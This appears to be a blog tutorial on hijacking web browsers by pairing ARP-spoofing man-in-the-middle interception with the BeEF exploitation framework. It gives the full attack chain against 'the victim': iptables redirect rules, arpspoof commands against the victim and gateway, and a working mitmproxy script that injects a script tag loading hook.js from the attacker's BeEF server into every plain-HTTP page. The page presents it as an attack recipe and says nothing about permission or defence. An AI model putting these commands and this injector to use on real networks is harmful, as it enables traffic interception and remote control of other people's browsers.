Hacking browsers with BeEF and Man In The Middle Attack

In this article, I will demonstrate how the Browser Exploitation Framework (BeEF) can be used together with Man In The Middle Attack (MITM) to hack web browsers.


What is BeEF?

BeEF is an awesome penetration testing tool that is used to exploit browsers by first "hooking" them with a "hook.js" file. The idea is to make the victim open a web page on his browser that has this "hook.js" file embedded. This javascript file will then connect itself to the BeEF instance running on the hacker's machine, and the hooking is complete. The hacker can now control that particular web page and hence exploit the browser.


What is Man In The Middle Attack?

Man In The Middle Attack is where an attacker places himself between you, and your router using a technique known as ARP spoofing.

By doing so, all your Internet traffic is routed though the attacker's machine (the "man in the middle") instead of your router. This will give the attacker an advantage because he/she can now see and even modify your Internet traffic (both incoming and outgoing) as they want. This is obviously only valid only for websites that don't use a secure HTTPS connection. Since HTTPS provides authenticity and encryption, Man In The Middle Attack won't work on HTTPS websites.


Combining BeEF and Man In The Middle Attack

The idea is simple, we want to modify the internet traffic of the victim such that before sending him/her the website responses, we will inject the "hook.js" file in the response messages. In this way, BeEF can control all the websites that the victim is using on his browser.


Step 1. Install BeEF

BeEF comes pre-installed with Kali Linux, but if you want to install it manually you can do so,


sudo apt-get install beef-xss


Step 2. Run BeEF

You can start BeEF framework by typing this command


sudo beef-xss

This will start BeEF and serve a web interface at http://<IP>:3000/ui

Go to this URL, and login with the default credentials (username: beef, password: beef)


Now you can see the BeEF control panel


Step 3. Start the Man In The Middle Attack

In-order to start the MITM attack, you first need to enable IP forwarding on your Kali Linux,


sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -A FORWARD --in-interface [iface] -j ACCEPT
sudo iptables -t nat -A PREROUTING -i [iface] -p tcp --dport 80 -j REDIRECT --to-port 8080

Replace [iface] with your interface in the above commands. You can find out your interface name by typing in "ifconifg" in your terminal.


Next, you need to install the arpspoof utility.

sudo apt-get install dsniff

Then, start the ARP spoofing with the arpspoof utility.


In the first terminal, run

arpspoof -i [iface] -t [victim-ip] [gateway-ip]

The [victim-ip] should be the IP address of the victim, [gateway-ip] is the IP address of your router (you can find it out by typing in "ip route" in your terminal)


In your second terminal, run

arpspoof -i [iface] -t [gateway-ip] [victim-ip]

The Man In The Middle is now setup. All the victim's internet traffic on port 80 is routed through our machine. But, in order to monitor or modify the traffic, we need to use a proxy tool. We'll be using a tool called "mitmproxy".


First, install it

sudo apt-get install mitmproxy
pip install mitmproxy

Before we start the proxy tool, we need to write a python utility that will automatically inject the "hook.js" file in every response message captured by the proxy tool.

Here is the python script that does it,

import os
from bs4 import BeautifulSoup
from mitmproxy import http

class Injector:
    def load(self, loader):
        loader.add_option(
            "script", str, "", "My Script Tag"
        )

    def response(self, flow: http.HTTPFlow) -> None:
        if flow.response.headers.get("content-type").find("text/html") != -1:
            html = BeautifulSoup(flow.response.content, "html.parser")
            if html.head:
                script = html.new_tag(
                    "script", id="mitmproxy", src="http://0.0.0.0:3000/hook.js", type="application/javascript")
                html.head.insert(0, script)
                flow.response.content = str(html).encode("utf8")

addons = [Injector()]

Replace the IP address 0.0.0.0 with your IP address (where the BeEF is running)


Now, start the proxy tool by giving this python script as input.

mitmdump --mode transparent -s js_injector.py

This will start the proxy tool, and for every response it captures, it will execute the python script that is passed as input, which in turn will inject the "hook.js" file into the message.


That's it! Now, all the websites that work on plain HTTP are injected with the hook.js file and you can control all of them using BeEF control panel.


2,461 views2 comments

Recent Posts

See All